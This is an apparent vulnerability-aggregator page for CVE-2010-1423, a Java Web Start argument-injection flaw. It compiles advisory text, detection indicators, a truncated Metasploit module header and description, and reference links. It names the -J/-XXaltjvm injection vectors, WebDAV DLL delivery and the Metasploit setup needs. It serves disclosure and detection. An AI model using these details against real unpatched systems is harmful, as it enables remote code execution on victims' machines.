CVE-2010-1423
published 2010-04-15CVE-2010-1423: Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when…
PriorityP268critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
55.58%
98.9th percentile
Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | jdk | <= 1.6.0 | — |
| oracle | jdk | — | — |
| oracle | jre | <= 1.6.0 | — |
| oracle | jre | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect invocation of javaws.exe with -J or -XXaltjvm arguments, which are the core injection vectors for this vulnerability ↗
- →Monitor for browser processes spawning javaws.exe with UNC paths (\\host\share) passed via -XXaltjvm, indicating WebDAV-based DLL injection ↗
- →Detect instantiation of Java Deployment Toolkit ActiveX (CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA) or NPAPI plugin (application/npruntime-scriptable-plugin;deploymenttoolkit) calling the launch() method in browser context ↗
- →The exploit module requires SRVPORT=80 and URIPATH=/ and uses WebDAV (OPTIONS/PROPFIND methods) to serve a malicious DLL; detect inbound WebDAV PROPFIND requests for .dll files from Windows hosts ↗
- ·Exploitation requires the target host to have the WebClient service (WebDAV Mini-Redirector) enabled; the attack will not succeed if this service is disabled ↗
- ·The Metasploit module must be run as root on a server that does not serve SMB, and requires SRVPORT=80 and URIPATH=/ for WebDAV to function ↗
- ·The vulnerability primarily affects Windows; Linux impact is uncertain per the advisory ↗
- ·All Java 6 versions since Update 10 are believed to be affected; the fix was delivered in Java 6 Update 20 ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-563f-2v9h-x957: Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versio
ghsa_unreviewed·2022-05-02
CVE-2010-1423 [HIGH] CWE-78 GHSA-563f-2v9h-x957: Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versio
Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.
Red Hat
Java: Java Web Start arbitrary command line injection
vendor_redhat·2010-04-09·CVSS 9.3
CVE-2010-1423 [CRITICAL] Java: Java Web Start arbitrary command line injection
Java: Java Web Start arbitrary command line injection
Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)
exploitdb·2010-04-09
CVE-2010-1423 Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)
Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule 'Sun Java Web Start Plugin Command Line Argument Injection',
'Description' => %q{
This module exploits a flaw in the Web Start plugin component of Sun Java
Web Start. The arguments passed to Java Web Start are not properly validated.
By passing the lesser known -J option, an attacker can pass arbitrary options
directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed
by Ruben Santamarta, an attacker can execute arbitrary code in the context of
an unsuspecting browser user.
This vulnerability was originally discover
Metasploit
Sun Java Web Start Plugin Command Line Argument Injection
metasploit
Sun Java Web Start Plugin Command Line Argument Injection
Sun Java Web Start Plugin Command Line Argument Injection
This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, th
Bugzilla
CVE-2010-0886 CVE-2010-0887 Sun Java: Java Web Start arbitrary command line injection
bugzilla·2010-04-11·CVSS 10.0
CVE-2010-0886 [CRITICAL] CVE-2010-0886 CVE-2010-0887 Sun Java: Java Web Start arbitrary command line injection
CVE-2010-0886 CVE-2010-0887 Sun Java: Java Web Start arbitrary command line injection
Tavis Ormandy reported:
[1] http://seclists.org/fulldisclosure/2010/Apr/119
a deficiency in the way Java Deployment Toolkit's
Java Web Start sanitized URL of the applications, intended
to be launched and installed via the Java Networking
Launching Protocol. Remote attacker could trick a local
victim into visiting a specially-crafted web page, potentially
leading to execution of arbitrary Java code with the
privileges of the user opening the page.
References:
[2] http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1
[3] http://bugs.gentoo.org/show_bug.cgi?id=314531
CVE Request:
[4] http://www.openwall.com/lists/oss-security/2010/04/10/2
Discussion:
Sun never open sourced th
Zscaler
Incognito Exploit Kit | Zscaler
blogs_zscaler·2011-06-14
Incognito Exploit Kit | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.htmlhttp://osvdb.org/63648http://secunia.com/advisories/39260http://www.kb.cert.org/vuls/id/886582http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1http://www.securitytracker.com/id?1023840http://www.vupen.com/english/advisories/2010/0853https://exchange.xforce.ibmcloud.com/vulnerabilities/57615https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14090http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.htmlhttp://osvdb.org/63648http://secunia.com/advisories/39260http://www.kb.cert.org/vuls/id/886582http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1http://www.securitytracker.com/id?1023840http://www.vupen.com/english/advisories/2010/0853https://exchange.xforce.ibmcloud.com/vulnerabilities/57615https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14090
2010-04-15
Published